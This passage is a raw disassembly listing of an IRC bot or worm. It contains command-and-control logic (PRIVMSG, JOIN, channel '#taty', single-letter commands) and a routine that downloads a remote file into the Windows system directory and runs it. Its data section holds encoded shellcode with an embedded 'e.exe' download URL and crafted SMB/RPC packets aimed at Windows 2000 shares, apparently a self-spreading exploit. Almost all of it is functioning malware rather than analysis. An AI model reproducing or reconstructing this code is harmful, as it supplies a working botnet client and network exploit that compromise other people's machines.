call dword_3150113C ; wsprintfA
add esp, 14h
lea eax, [ebp+var_14C]
push 0
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp+var_14C]
push eax
push dword ptr [esi+5Ch]
call dword_3150119C ; send
push dword ptr [esi+5Ch]
call dword_315011A8 ; closesocket
xor eax, eax
pop esi
leave
retn
sub_3150315E endp
; =============== S U B R O U T I N E =======================================
sub_315031C7 proc near ; CODE XREF: UPX0:315035AC�p
mov eax, offset loc_31503AA4
call sub_31503A78
sub esp, 110h
push ebx
push esi
push edi
mov edi, dword_315010C8
mov esi, ecx
mov [ebp-10h], esp
mov [ebp-14h], esi
call edi ; GetTickCount
mov [ebp-18h], eax
mov eax, [esi+5Ch]
mov dword ptr [ebp-11Ch], 1
mov [ebp-118h], eax
xor ebx, ebx
loc_31503202: ; CODE XREF: sub_315031C7+EF�j
call sub_31501A32
test eax, eax
jz short loc_3150324F
push ebx
push ebx
lea eax, [ebp-11Ch]
push ebx
push eax
push 1
call dword_31501164 ; select
cmp eax, 0FFFFFFFFh
jz short loc_3150324F
call sub_31501D75
test eax, eax
jz short loc_31503233
push 1
call dword_315010E0 ; ExitThread
loc_31503233: ; CODE XREF: sub_315031C7+62�j
mov [ebp-4], ebx
call edi ; GetTickCount
mov ecx, [ebp+8]
sub eax, [ebp-18h]
imul ecx, 0EA60h
cmp eax, ecx
jbe short loc_31503262
mov ecx, esi
call sub_3150315E
loc_3150324F: ; CODE XREF: sub_315031C7+42�j
; sub_315031C7+59�j ...
xor eax, eax
loc_31503251: ; CODE XREF: sub_315031C7+109�j
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31503262: ; CODE XREF: sub_315031C7+7F�j
push ebx
push 20000h
push dword ptr [esi+2Ch]
push dword ptr [esi+5Ch]
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_315032CD
mov ecx, [esi+2Ch]
push 64h
mov [ecx+eax], bl
call dword_315010A4 ; Sleep
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_31503009
push dword ptr [esi+2Ch]
mov ecx, esi
call sub_315036FD
cmp eax, ebx
jnz short loc_3150324F
or dword ptr [ebp-4], 0FFFFFFFFh
call sub_31501A32
test eax, eax
jz short loc_3150324F
push 64h
call dword_315010A4 ; Sleep
jmp loc_31503202
; ---------------------------------------------------------------------------
loc_315032BB: ; DATA XREF: UPX0:31503B1C�o
mov eax, [ebp-14h]
push dword ptr [eax+5Ch]
call dword_315011A8 ; closesocket
mov eax, offset loc_315032CD
retn
; ---------------------------------------------------------------------------
loc_315032CD: ; CODE XREF: sub_315031C7+B2�j
; DATA XREF: sub_315031C7+100�o
push 1
pop eax
jmp loc_31503251
sub_315031C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315032D5 proc near ; CODE XREF: sub_315036FD+9C�p
; sub_315036FD+2B7�p
var_12C = byte ptr -12Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 12Ch
push ebx
push esi
mov esi, dword_315010A0
push edi
push [ebp+arg_0]
mov edi, ecx
call esi ; lstrlenA
push [ebp+arg_4]
mov ebx, eax
call esi ; lstrlenA
add ebx, eax
cmp ebx, 10Eh
jle short loc_31503304
push 1
pop eax
jmp short loc_31503345
; ---------------------------------------------------------------------------
loc_31503304: ; CODE XREF: sub_315032D5+28�j
push [ebp+arg_4]
lea eax, [ebp+var_12C]
push [ebp+arg_0]
push offset aPrivmsgSS ; "PRIVMSG %s %s\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 10h
push 64h
call dword_315010A4 ; Sleep
lea eax, [ebp+var_12C]
push 0
push eax
call esi ; lstrlenA
push eax
lea eax, [ebp+var_12C]
push eax
push dword ptr [edi+5Ch]
call dword_3150119C ; send
xor eax, eax
loc_31503345: ; CODE XREF: sub_315032D5+2D�j
pop edi
pop esi
pop ebx
leave
retn 8
sub_315032D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150334C proc near ; CODE XREF: UPX0:3150345F�p
var_24 = qword ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_16 = word ptr -16h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
lea eax, [ebp+var_1C]
push eax
call dword_31501050 ; GetSystemTime
movzx eax, [ebp+var_1A]
mov [ebp+var_4], eax
push ecx
fild [ebp+var_4]
push ecx
fstp [esp+24h+var_24]
call sub_31503A8A ; atan
movzx eax, [ebp+var_16]
fstp [ebp+var_C]
mov [ebp+var_4], eax
fild [ebp+var_4]
fstp [esp+24h+var_24]
call sub_31503A84 ; sin
movzx eax, [ebp+var_1C]
fmul [ebp+var_C]
lea eax, [eax+eax*2]
fstp [ebp+var_C]
mov [ebp+var_4], eax
fild [ebp+var_4]
fstp [esp+24h+var_24]
call sub_31503A7E ; cos
fadd [ebp+var_C]
fstp [ebp+var_C]
push dword ptr [ebp+var_C]
call dword_31501128 ; srand
mov eax, [ebp+arg_0]
push 7
mov byte ptr [eax], 23h
inc eax
push eax
call sub_31501932
push 8
push [ebp+arg_4]
call sub_31501932
add esp, 1Ch
call dword_31501124 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
mov [eax], edx
call sub_315018BA
leave
retn
sub_3150334C endp
; ---------------------------------------------------------------------------
loc_315033E3: ; DATA XREF: sub_31501D89+128�o
mov eax, offset loc_31503ABB
call sub_31503A78
sub esp, 2E8h
push ebx
push esi
xor ebx, ebx
push edi
mov ds:dword_31506194, ebx
call sub_315018BA
mov esi, dword_31501124
call esi ; rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp-4Ch]
add edx, ecx
push edx
push eax
call sub_31501932
cmp ds:dword_31506190, ebx
mov edi, dword_3150106C
pop ecx
pop ecx
jz short loc_31503438
lea eax, [ebp-4Ch]
push offset a_ ; "_"
push eax
call edi ; lstrcatA
loc_31503438: ; CODE XREF: UPX0:3150342B�j
lea eax, [ebp-4Ch]
push offset a13 ; "13"
push eax
call edi ; lstrcatA
lea ecx, [ebp-2F4h]
call sub_31502D7C
mov [ebp-4], ebx
loc_31503451: ; CODE XREF: UPX0:315035B8�j
; UPX0:315035DE�j
push offset dword_31506198
lea eax, [ebp-18h]
push offset dword_3150619C
push eax
call sub_3150334C
add esp, 0Ch
loc_31503467: ; CODE XREF: UPX0:3150347B�j
call sub_31501A32
test eax, eax
jnz short loc_3150347D
push 3E8h
call dword_315010A4 ; Sleep
jmp short loc_31503467
; ---------------------------------------------------------------------------
loc_3150347D: ; CODE XREF: UPX0:3150346E�j
xor ebx, ebx
call esi ; rand
push 7
cdq
pop ecx
idiv ecx
lea eax, [ebp-6Ch]
add edx, 5
push edx
push eax
call sub_31501932
pop ecx
xor edi, edi
pop ecx
loc_31503498: ; CODE XREF: UPX0:315034D4�j
push 1A0Bh
lea ecx, [ebp-2F4h]
push off_31505E04
call sub_31502D91
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-2F4h]
call sub_31502DC7
test eax, eax
jz short loc_3150352B
inc edi
cmp edi, 8
jl short loc_31503498
xor edi, edi
loc_315034D8: ; CODE XREF: UPX0:31503527�j
call sub_31501A32
test eax, eax
jz short loc_31503539
push 1A0Bh
call esi ; rand
push 13h
xor edx, edx
pop ecx
div ecx
lea ecx, [ebp-2F4h]
push off_31505E04[edx*4]
call sub_31502D91
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-4Ch]
push eax
call dword_315010A0 ; lstrlenA
push eax
lea eax, [ebp-4Ch]
push eax
lea ecx, [ebp-2F4h]
call sub_31502DC7
test eax, eax
jz short loc_31503536
inc edi
cmp edi, 4Ch
jb short loc_315034D8
jmp short loc_31503539
; ---------------------------------------------------------------------------
loc_3150352B: ; CODE XREF: UPX0:315034CE�j
push 1
pop ebx
mov ds:dword_31506194, ebx
jmp short loc_31503542
; ---------------------------------------------------------------------------
loc_31503536: ; CODE XREF: UPX0:31503521�j
push 1
pop ebx
loc_31503539: ; CODE XREF: UPX0:315034DF�j
; UPX0:31503529�j
cmp ds:dword_31506194, 0
jz short loc_31503551
loc_31503542: ; CODE XREF: UPX0:31503534�j
lea eax, [ebp-18h]
push offset aTaty ; "#taty"
push eax
call dword_31501088 ; lstrcpyA
loc_31503551: ; CODE XREF: UPX0:31503540�j
test ebx, ebx
jz short loc_315035C9
call sub_31501A32
test eax, eax
jz short loc_315035C9
loc_3150355E: ; CODE XREF: UPX0:31503583�j
lea eax, [ebp-18h]
lea ecx, [ebp-2F4h]
push eax
call sub_3150308C
test eax, eax
jz short loc_31503585
push 3E8h
call dword_315010A4 ; Sleep
call sub_31501A32
test eax, eax
jnz short loc_3150355E
loc_31503585: ; CODE XREF: UPX0:3150356F�j
cmp ds:dword_31506194, 0
jz short loc_31503595
mov edx, 0A8C0h
jmp short loc_315035A5
; ---------------------------------------------------------------------------
loc_31503595: ; CODE XREF: UPX0:3150358C�j
call esi ; rand
cdq
mov ecx, 1F4h
idiv ecx
add edx, 578h
loc_315035A5: ; CODE XREF: UPX0:31503593�j
push edx
lea ecx, [ebp-2F4h]
call sub_315031C7
call sub_31501A32
test eax, eax
jz loc_31503451
lea ecx, [ebp-2F4h]
call sub_3150315E
loc_315035C9: ; CODE XREF: UPX0:31503553�j
; UPX0:3150355C�j
call esi ; rand
push 0Ah
cdq
pop ecx
idiv ecx
imul edx, 0EA60h
push edx
call dword_315010A4 ; Sleep
jmp loc_31503451
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315035E3 proc near ; CODE XREF: sub_315036FD+5E�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31501154 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_3150360E
push 1
jmp loc_315036A4
; ---------------------------------------------------------------------------
loc_3150360E: ; CODE XREF: sub_315035E3+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_31501068 ; GetSystemDirectoryA
mov edi, dword_3150106C
lea eax, [ebp+var_110]
push offset asc_31505CE0 ; "\\"
push eax
call edi ; lstrcatA
lea eax, [ebp+var_110]
push 6
push eax
call dword_315010A0 ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_31501932
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset a_exe ; ".exe"
push eax
call edi ; lstrcatA
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_315010EC ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_31503684
push 2
jmp short loc_315036A4
; ---------------------------------------------------------------------------
loc_31503684: ; CODE XREF: sub_315035E3+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31501150 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_315036A7
push [ebp+var_4]
call dword_315010BC ; CloseHandle
push 3
loc_315036A4: ; CODE XREF: sub_315035E3+26�j
; sub_315035E3+9F�j
pop eax
jmp short loc_315036F8
; ---------------------------------------------------------------------------
loc_315036A7: ; CODE XREF: sub_315035E3+B4�j
mov edi, 100000h
push edi
call sub_315027DB
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31501158 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_3150104C ; WriteFile
push [ebp+var_4]
call dword_315010BC ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31501962
push ebx
call sub_315027EF
add esp, 0Ch
xor eax, eax
loc_315036F8: ; CODE XREF: sub_315035E3+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_315035E3 endp
; =============== S U B R O U T I N E =======================================
sub_315036FD proc near ; CODE XREF: sub_315031C7+D1�p
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_264 = byte ptr -264h
var_200 = byte ptr -200h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 4
sub esp, 2CCh
push ebx
push ebp
push esi
push edi
push offset dword_3150619C
mov esi, ecx
push [esp+2E0h+arg_0]
call dword_31501120 ; strstr
mov edi, dword_315010C8
pop ecx
mov ebx, eax
pop ecx
mov [esp+2DCh+var_2CC], ebx
call edi ; GetTickCount
sub eax, [esi+70h]
cmp eax, 927C0h
jbe short loc_3150373C
and dword ptr [esi+284h], 0
loc_3150373C: ; CODE XREF: sub_315036FD+36�j
cmp dword ptr [esi+7Ch], 0
jz short loc_3150379E
call edi ; GetTickCount
mov ecx, [esi+78h]
sub eax, [esi+74h]
imul ecx, 3E8h
cmp eax, ecx
jbe short loc_3150379E
lea eax, [esi+180h]
push eax
call sub_315035E3
test eax, eax
pop ecx
jnz short loc_3150379E
call edi ; GetTickCount
push dword ptr [esi+78h]
and dword ptr [esi+7Ch], 0
mov [esi+70h], eax
lea eax, [esp+2E0h+var_2C8]
push offset a1D ; "-1,%d"
push eax
mov dword ptr [esi+284h], 1
call dword_3150113C ; wsprintfA
add esp, 0Ch
lea eax, [esp+2DCh+var_2C8]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_315032D5
loc_3150379E: ; CODE XREF: sub_315036FD+43�j
; sub_315036FD+55�j ...
test ebx, ebx
jz loc_315039DC
push ebx
call dword_315010A0 ; lstrlenA
cmp eax, 0Ah
jle loc_315039DC
mov ebp, dword_31501110
add ebx, 8
push 7Ch
push ebx
call ebp ; strchr
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz loc_315039DC
and byte ptr [edi], 0
push ebx
call dword_315010A0 ; lstrlenA
cmp eax, 100h
jge loc_31503A03
push ds:dword_31506198
lea eax, [esp+2E0h+var_200]
push ebx
push eax
call sub_31502D17
lea ebx, [edi+1]
push 7Ch
push ebx
mov byte ptr [edi], 7Ch
call ebp ; strchr
mov edi, eax
add esp, 14h
test edi, edi
jz loc_315039DC
and byte ptr [edi], 0
push ebx
call dword_315010A0 ; lstrlenA
cmp eax, 100h
jge loc_31503A03
push ds:dword_31506198
lea eax, [esi+180h]
push ebx
push eax
call sub_31502D17
add esp, 0Ch
lea eax, [esp+2DCh+var_200]
push offset aE ; "e"
push eax
call dword_31501040 ; lstrcmpA
mov ebx, dword_31501088
test eax, eax
jnz loc_31503943
lea eax, [esi+180h]
push eax
call dword_315010A0 ; lstrlenA
cmp eax, 0FFh
jge loc_31503943
cmp dword ptr [esi+284h], 0
jnz loc_31503943
cmp dword ptr [esi+7Ch], 0
jnz loc_31503943
lea eax, [edi+1]
push 7Ch
push eax
call ebp ; strchr
mov ebp, eax
pop ecx
test ebp, ebp
pop ecx
jz loc_31503924
and byte ptr [ebp+0], 0
lea eax, [edi+1]
push eax
call dword_315010A0 ; lstrlenA
cmp eax, 100h
jge loc_31503A03
lea eax, [edi+1]
push eax
lea eax, [esp+2E0h+var_100]
push eax
call ebx ; lstrcpyA
push [esp+2DCh+var_2CC]
lea eax, [esi+80h]
mov byte ptr [edi], 7Ch
push eax
call ebx ; lstrcpyA
mov byte ptr [ebp+0], 7Ch
and byte ptr [edi], 0
cmp [esp+2DCh+var_100], 65h
jle short loc_31503931
lea eax, [esp+2DCh+var_FF]
push eax
call dword_315010F8 ; atoi
mov ebp, eax
pop ecx
test ebp, ebp
jz short loc_31503931
cmp ebp, 0E10h
jnb short loc_31503931
call dword_31501124 ; rand
xor edx, edx
mov dword ptr [esi+7Ch], 1
div ebp
mov [esi+78h], edx
call dword_315010C8 ; GetTickCount
mov [esi+74h], eax
jmp short loc_31503931
; ---------------------------------------------------------------------------
loc_31503924: ; CODE XREF: sub_315036FD+19D�j
push [esp+2DCh+var_2CC]
lea eax, [esi+80h]
push eax
call ebx ; lstrcpyA
loc_31503931: ; CODE XREF: sub_315036FD+1E9�j
; sub_315036FD+1FE�j ...
lea eax, [esi+80h]
push offset asc_31506114 ; "|"
push eax
call dword_3150106C ; lstrcatA
loc_31503943: ; CODE XREF: sub_315036FD+15A�j
; sub_315036FD+172�j ...
mov ebp, dword_31501040
lea eax, [esp+2DCh+var_200]
push offset aI ; "i"
push eax
call ebp ; lstrcmpA
test eax, eax
jnz short loc_315039B9
lea eax, [esp+2DCh+var_2C8]
push offset dword_315061BC
push eax
call ebx ; lstrcpyA
lea eax, [esp+2DCh+var_2C8]
push 63h
push eax
push 7
push 400h
call dword_31501040+4
push ds:dword_31506188
lea eax, [esp+2E0h+var_2C8]
push eax
lea eax, [esp+2E4h+var_264]
push ds:dword_31506184
push ds:dword_3150614C
push offset aDD13SD ; "%d,%d,13%s,%d"
push eax
call dword_3150113C ; wsprintfA
add esp, 18h
lea eax, [esp+2DCh+var_264]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_315032D5
loc_315039B9: ; CODE XREF: sub_315036FD+25D�j
lea eax, [esp+2DCh+var_200]
push offset aQ ; "q"
push eax
call ebp ; lstrcmpA
test eax, eax
jnz short loc_315039D9
cmp [esi+284h], eax
jz short loc_315039D9
push 1
pop eax
jmp short loc_31503A05
; ---------------------------------------------------------------------------
loc_315039D9: ; CODE XREF: sub_315036FD+2CD�j
; sub_315036FD+2D5�j
mov byte ptr [edi], 7Ch
loc_315039DC: ; CODE XREF: sub_315036FD+A3�j
; sub_315036FD+B3�j ...
cmp dword ptr [esi+284h], 0
jz short loc_31503A03
push offset aJoin ; "JOIN"
push [esp+2E0h+arg_0]
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31503A03
call dword_31501124 ; rand
loc_31503A03: ; CODE XREF: sub_315036FD+E2�j
; sub_315036FD+123�j ...
xor eax, eax
loc_31503A05: ; CODE XREF: sub_315036FD+2DA�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 2CCh
retn 4
sub_315036FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A12 proc near ; CODE XREF: sub_315011C0+128�p
; sub_315011C0+134�p ...
jmp dword_31501134
sub_31503A12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A18 proc near ; CODE XREF: sub_315011C0+9C�p
; sub_315011C0+C5�p ...
jmp dword_31501130
sub_31503A18 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A1E proc near ; CODE XREF: sub_315011C0+93�p
; sub_315011C0+B2�p ...
jmp dword_3150112C
sub_31503A1E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31503A30 proc near ; CODE XREF: sub_315011C0+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31503A50
loc_31503A3C: ; CODE XREF: sub_31503A30+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_31503A3C
loc_31503A50: ; CODE XREF: sub_31503A30+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31503A30 endp
; ---------------------------------------------------------------------------
align 10h
loc_31503A60: ; DATA XREF: sub_31501D89+A�o
jmp dword ptr loc_3150111C
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A66 proc near ; CODE XREF: sub_31501F46+10C�p
; sub_31501F46+119�p ...
jmp dword_31501118
sub_31503A66 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A6C proc near ; CODE XREF: sub_31501F46+35�p
jmp dword_31501114
sub_31503A6C endp
; ---------------------------------------------------------------------------
loc_31503A72: ; CODE XREF: UPX0:31503AA9�j
; UPX0:31503AC0�j
jmp dword ptr locret_3150110A+2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A78 proc near ; CODE XREF: sub_315031C7+5�p
; UPX0:315033E8�p
jmp dword ptr loc_31501108
sub_31503A78 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A7E proc near ; CODE XREF: sub_3150334C+4F�p
jmp dword_31501104
sub_31503A7E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A84 proc near ; CODE XREF: sub_3150334C+34�p
jmp dword_31501100
sub_31503A84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A8A proc near ; CODE XREF: sub_3150334C+1F�p
jmp dword_315010FC
sub_31503A8A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A90 proc near ; CODE XREF: sub_3150246B+AB�p
jmp dword_31501084
sub_31503A90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A96 proc near ; CODE XREF: sub_3150246B+64�p
jmp dword_3150107C
sub_31503A96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31503A9C proc near ; CODE XREF: sub_3150246B+2D�p
jmp dword_31501078
sub_31503A9C endp
; ---------------------------------------------------------------------------
align 4
loc_31503AA4: ; DATA XREF: sub_315031C7�o
mov eax, offset dword_31503AC8
jmp loc_31503A72
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-2F4h]
jmp loc_31502DAF
; ---------------------------------------------------------------------------
loc_31503ABB: ; DATA XREF: UPX0:loc_315033E3�o
mov eax, offset dword_31503B20
jmp loc_31503A72
; ---------------------------------------------------------------------------
align 4
dword_31503AC8 dd 19930520h, 2, 31503AE8h, 1, 31503AF8h, 3 dup(0)
; DATA XREF: UPX0:loc_31503AA4�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 31503B10h, 4 dup(0)
dd offset loc_315032BB
dword_31503B20 dd 19930520h, 1, 31503B40h, 5 dup(0) dd 0FFFFFFFFh, 31503AB0h, 52Eh dup(0)
byte_31505000 db 0EBh ; DATA XREF: sub_315011C0+24E�o
; sub_315011C0+260�o ...
db 58h
word_31505002 dw 7468h ; DATA XREF: sub_31502252+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EFB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C371C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B271C999h
dd 99C99998h, 0E3F367C9h, 0DF1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A00414D9h, 99C99998h
dd 9171CAC9h, 99C99998h, 61688DC9h, 0AC1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992471h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993A71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DF2Ch, 0C9C999C9h, 0C9991171h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DF2C66CBh, 99C99998h, 0AC2C66C9h
dd 99C99998h, 990A71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ACh, 1A71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A00414h, 0C999C999h, 99E871CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FF71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 0C999F0AAh, 2 dup(0C999C999h)
dd 0EDFFC5B7h, 0FDE9ECE9h, 0FCE1FCB7h, 6 dup(0C999C999h)
dd 0F5CAC999h, 99E9FCFCh, 0EBFCF2C9h, 0AAF5FCF7h, 0C7C999ABh
dd 59AAF934h, 2A2A25B4h, 93ACC966h, 0C9B78190h, 639D909Ch
dd 71CDC983h, 99C99992h, 0BFC999C9h, 14513519h, 0A95BDFDh
dd 34C79172h, 99C871F9h, 99C999C9h, 0A5D212C9h, 0E180D512h
dd 6FAA529Ah, 9A2A8D14h, 8B12B9C8h, 59AA4A9Ah, 0AB9E5958h
dd 0A319DB9Bh, 6CECC999h, 85BDDDA2h, 0A2DF9EEDh, 44EB81E8h
dd 0BDC81255h, 2E964A9Ah, 0D812EB8Dh, 125A9A85h, 5A9A099Dh
dd 85BDDD10h, 0D31C10F8h, 99C99998h, 664966C9h, 12FEFD7Fh
dd 0C999A987h, 1295C212h, 821285C2h, 5A91C212h, 0FDF7FCB7h
dd 0B7h
dword_315052C8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_315011C0+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_31505354 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_31505400 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_315054E0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_315011C0+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_31505544 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_315055B0 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_31505654 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_315056D4 dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
